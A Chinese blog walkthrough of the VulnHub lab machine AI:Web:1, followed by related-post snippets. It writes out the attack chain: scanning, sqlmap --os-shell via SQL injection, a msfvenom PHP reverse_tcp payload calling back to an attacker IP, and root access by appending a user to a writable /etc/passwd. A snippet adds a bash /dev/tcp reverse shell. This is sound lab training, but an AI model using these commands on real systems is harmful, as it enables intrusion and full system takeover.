AI:Web-1靶场题解

最新推荐文章于 2022-11-21 22:36:48 发布
最新推荐文章于 2022-11-21 22:36:48 发布
阅读量736 收藏 2
点赞数
分类专栏: 渗透靶机学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42133828/article/details/100880013
版权

AI:Web-1靶场题解

前期准备

镜像下载

https://www.vulnhub.com/entry/ai-web-1,353/

环境配置:

在VM以net连接打开虚拟机

使用的机器:

攻击机:kali linux
靶机:ip随配(192.168.119.139)

渗透开始

1.nmap发现主机,扫描路径

nmap -A 192.168.119.139

在这里插入图片描述

nikto -h http://192.168.119.139/m3diNf0/

在这里插入图片描述

2.访问页面,sql注入

http://192.168.119.139/m3diNf0/info.php
在这里插入图片描述
获得网站根目录:
/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

http://192.168.119.139/se3reTdir777/#
在这里插入图片描述
使用sqlmap跑注入,获得shell

sqlmap.py -r  "C:\Users\DELL\Desktop\121.txt" -p uid --os-shell

在这里插入图片描述
路径输入:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/
拿到shell,并获得上传文件tmpuuqpk.php
在这里插入图片描述

3.上传木马,获得权限

访问网页 http://192.168.119.139/se3reTdir777/uploads/tmpuuqpk.php

在这里插入图片描述
上传msfvenom生成的php马

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.119.129  lport=5555  -f raw > shell.php

反弹shell得到权限
在这里插入图片描述

python -c 'import pty; pty.spawn("/bin/bash")'

4.提权

查看 /etc/passwd 文件权限,发现是www-data用户拥有

ls -al /etc/passwd

在这里插入图片描述
由于passwd文件是具有s权限的,所以可以通过写入一个用户,在进行提权

perl -le 'print crypt("123456","aa")'
echo "haha:aaAN1ZUwjW7to:0:0:i_am_root:/root:/bin/bash" >> /etc/passwd
cat /etc/passwd | grep haha

在这里插入图片描述
提权成功,获得flag.txt文件

su haha
cd /root
ls
cat flag.txt

在这里插入图片描述

南人旧心1906
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web-AI入门
Half_orc的博客
01-15 1188
概念 简介: Adobe illustrator是一种应用于出版、多媒体和在线图像的工业标准矢量插画的软件,作为一款非常好的矢量图形处理工具。该软件主要应用于印刷出版、海报书籍排版、专业插画、多媒体图像处理和互联网页面的制作等,也可以为线稿提供较高的精度和控制,适合生产任何小型设计到大型的复杂项目。 AI的学习类比PS更容易掌握(详见前6篇文章,故很多知识不再进行赘述) 工具介绍
Vulnhub靶机渗透之 AI: Web: 1
_Co1a
07-21 1105
靶机下载地址:AI:Web:1 Description: Difficulty: Intermediate Network: DHCP (Automatically assign) Network Mode: NAT This box is designed to test skills of penetration tester. The goal is simple. Get flag from /root/flag.txt. Enumerate the box, get low privi
vulnhub AI: Web: 1
weixin_30709635的博客
09-18 137
vulnhub AI: Web: 1 提取flag攻略 导入虚拟机,开机。 扫描NAT的C段,确定虚拟机IP和开放端口。 尝试访问该网站 发现什么都没有,抽根烟冷静一下...... 来波目录扫描吧 使用dirsearch 进行目录扫描 扫描发现存在 robots.txt文件 访问该文件看看有啥新发现 对以下目录继续进行目录扫描 http:/...
vulnhub靶场渗透系列-- AI:web:1
lza20001103的博客
10-02 3841
AI:web:1 文章目录AI:web:1前言靶机地址工具、知识点和漏洞存疑、待解决一、信息收集二、SQL注入三、提权file-dest 写入 webshellFind SUID添加用户名密码到/etc/passwd后记 前言 前面给大家讲解了外网和内网渗透的相关知识和技术,以及各种工具的使用,在我们渗透中都会遇到,接下来我们需要进行靶场的练习和渗透了,这也是一个提升渗透能力的方法,这里给大家推荐几个比较好的额靶场,vulnhub和红日靶场(http://vulnstack.qiyuanxuetang.ne
AI:WEB:1 Walkthrough
weixin_30470643的博客
09-26 314
AI: Web: 1 Vulnhub Walkthrough靶机下载:https://www.vulnhub.com/entry/ai-web-1,353/测试方法: Nmap网络扫描 浏览网页 爆破目录 SQL注入获取凭证 SQL注入获取shell 可写/etc/passwd 提权 读取falg文件靶机和攻击机处于统一网段下 所以就不用net...
AI:web1提权
qq_39742838的博客
12-09 303
1.AI:web1前期端口扫描和sql注入不再提了,教程也有很多,直接说提权。 2.傻傻的上传了一个php文件,想要反弹shell,bash -i >& /dev/tcp/192.168.133.128/4444 0>&1,监听4444端口,访问这个php文件,结果并没有结果,一定是姿势不对。 3.监听4444端口 在kali os-shell执行 py...
AIweb1靶场总结
胖虎的博客
11-03 474
aiweb1靶场总结
AI_web_1 ,靶机初体验
weixin_44377940的博客
12-06 360
大佬给了个这个靶机给我玩,我就试着打了一下,学到了很多东西,就记录下来了 首先,用netdiscover先看看主机的ip是啥: 试试第一个 图中可以看到,只开了个80端口,apache的中间件,其中的文件有robots.txt,下面两个目录不允许进入,这应该就是靶机的IP了。 浏览器打开看看: 试试id=1: 估计有注入,祭出神器sqlmap: 但是,好像没有意义,因为这个是sql用户,...
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
一道靶场面试题的解题思路
weixin_44508748的博客
06-11 1131
一、缘起 群里老哥丢出来一个某厂的面试靶场,跟着大佬学了些思路,记录如下。 整体流程:sql注入读取网站配置文件>拿到tomcat登录账号密码>登录tomcat上传war包>getshell。以下是脱敏后记录的详细过程: 二、 初探 目标是一个阉割版ecshop搭建的商城系统,利用已公开的漏洞无法拿下… 目标:http://1x.x.x.x:8080/eshop/UserLogin.jsp 直接web路径访问端口:http://1x.x.x.x:8080/发现tomcat的管理界面入口:
洛谷题解:P1000-超级玛丽游戏
最新发布
04-16
洛谷题解:P1000-超级玛丽游戏
题解:Atcoder - ABCF - Best Concatenation
06-27
代码
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
leetcode下载-leetcode-1:leetcode-1
06-29
题解,记录自己的 leetcode 解题之路。 本仓库目前分为四个部分: 第一个部分是 leetcode 经典题目的解析,包括思路,关键点和具体的代码实现。 第二部分是对于数据结构与算法的总结 第三部分是 anki 卡片, 将 ...
leetcode双人赛----:---
06-30
1 前言 项目为习题册攻略,已完结。可配合书籍或笔记,系统学习算法。 题量:约200道,代码注释内含详解。 难度:总体高于Leetcode,部分接近ACM。 题解:代码均AC,题解个人向;Bug或优化请建Issue或Pull Request。...
capture the ether靶场题解(Lotteries)
m0_68764244的博客
10-25 1167
这题同样要求我们猜answer,但他的answer是在每次Guess的时候生成的,无法通过web3进行查询,但我们明白一件事,合约之间的调用是在同一个区块当中的,也就是说,如果我们通过攻击合约进行调用guess,那么我们攻击合约生成的answer与guess生成的answer是相同的。这关他的answer是随机生成的,根据创建时候的区块数量进行生成,并且由于没有进行修饰符修饰,默认为internal变量,所以我们无法直接看到,但任何数据在区块链上都是无法隐藏的,我们通过web3库就能直接拿到该值。
鹏城AI靶场助力大规模高质量中文语料数据集安全开放
OpenI启智社区
09-02 352
鹏城实验室率先开放大规模高质量中文语料数据集,研究人员可在鹏城AI靶场上安全使用数据
capture the ether靶场题解(Math)
m0_68764244的博客
11-21 1859
if代码块本身的逻辑是没有问题的,并不会出现变量覆盖的情况,但else就不一样了,由于没有进if,相当于直接创建了一个结构体变量,这势必会造成变量覆盖,而能够覆盖的就是数组的长度以及head。由于数组的长度取决于我们传入的wei数,而在push中会对数组的length++,length又跟amount公用一个slot,所以我们传入1wei则长度和amount都2,我们两次都传入1wei,则第一次push的结构体会被第二次push的结构体覆盖,具体原因我就不一一阐释了。
AI:WEB:02靶场题解
qq_42133828的博客
09-19 1175
AI:WEB:02靶场题解 前期准备 镜像下载 https://www.vulnhub.com/entry/ai-web-2,357/ 环境配置: 在VM以net连接打开虚拟机 使用的机器: 攻击机:kali linux 靶机:ip随配(192.168.203.136) 渗透开始 1.nmap发现主机,并扫描其ip信息, nmap --script=vuln 192.168.203.136 发现路...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值